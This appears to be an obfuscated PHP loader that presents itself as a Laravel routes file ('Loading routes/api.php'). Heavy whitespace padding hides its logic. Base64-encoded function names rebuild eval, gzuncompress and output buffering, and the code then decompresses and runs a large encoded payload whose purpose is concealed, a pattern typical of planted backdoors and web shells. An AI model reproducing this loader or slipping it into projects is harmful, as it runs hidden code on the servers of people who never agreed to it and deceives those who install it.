<?php 
        $__='printf';$_='Loading routes/api.php';
        



























































































































































                                                                                                                                                                                                $_____='    b2JfZW5kX2NsZWFu';                                                                                                                                                                              $______________='cmV0dXJuIGV2YWwoJF8pOw==';
$__________________='X19sYW1iZGE=';

                                                                                                                                                                                                                                          $______=' Z3p1bmNvbXByZXNz';                    $___='  b2Jfc3RhcnQ=';                                                                                                    $____='b2JfZ2V0X2NvbnRlbnRz';                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                $__=                                                              'base64_decode'                           ;                                                                       $______=$__($______);           if(!function_exists('__lambda')){function __lambda($sArgs,$sCode){return eval("return function($sArgs){{$sCode}};");}}                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    $__________________=$__($__________________);                                                                                                                                                                                                                                                                                                                                                                         $______________=$__($______________);
        $__________=$__________________('$_',$______________);                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 $_____=$__($_____);                                                                                                                                                                                                                                                    $____=$__($____);                                                                                                                    $___=$__($___);                      $_='eNrtmk1vm0AQhu+W+h98iESqVi5gp45lcQgrgxdaUkPM1yWCxV4ICybBn/n1XWwnadRLqiaVGs2DbMPasy/zzrAHa9vtAyfXHEWo7rJyOReG+8sjinC3WC1n9ZeoyjpVWrURi+q60+kIw9Yxuv2hBcfrHa3G/vYrovw2IvjSoA48KQv1kSLsh56q+SKOLaK0AQAA3icCKVwx8Y0V1l058DYLQxvM/V3ePyyafNU8LNfXYBUAAAAAAAAA/G/A3xkAAADvFyGO6tnX3nUyI4tkJgzBEQAAAAD4K57vG0C0kog8pY63rRNPquJCE0N3i5OxvfE1gxHfZaQ76aPSvQ8d1Yj1rRR7bBX4NvM1SyJjdU1Km9iFdhN4NiPS1om7rhhe1SbKzm9RuVl+c8S3fU2qczzSJo6jHrT97+YciW+uy3PjOioOfYNhnd3jcbLYn4/ZOnFU7kePksItI9/i94TpxFUNPDbWCfeO7NQi7mI68wYSydSU+1hHnpUmOlvHWY+6esp4XZr5d8ecaLDX2a4bn0OkZjNHFSN9SqfFQEp094pry3wONm00CpY3monM+G/YCusjGnYb7Qs+llaBTJu5K34fKelaVSifNXPu58OFtokcTHmd81DfskTWdrz2JeE6BPWo7Z3dxt2cBqVbxbrNe4Y85KFOR3na+GJm5yZih1wvb6pl5Nl5rLvdJgcTJSkfX1yWVhoXlph4Ymk64qdQdkUTER5jMZKRGuuh1HwfeYMVRqkT+poUci8xsncP56aj9lF2QTH3KfRtiRQ9aowf+3b5o+lbHy9M3o9zJ+8jqijCsNX69w+csv88PV59HP5J+C+xLwk8eRI8FZp34fOjLOwHepv9QM+9P31W7IP1H4c/ASVCTVc=';

        $___();$__________($______($__($_))); $________=$____();
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             $_____();                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       echo                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      


























































































































































                                                                                                                                                                                                                     $________;
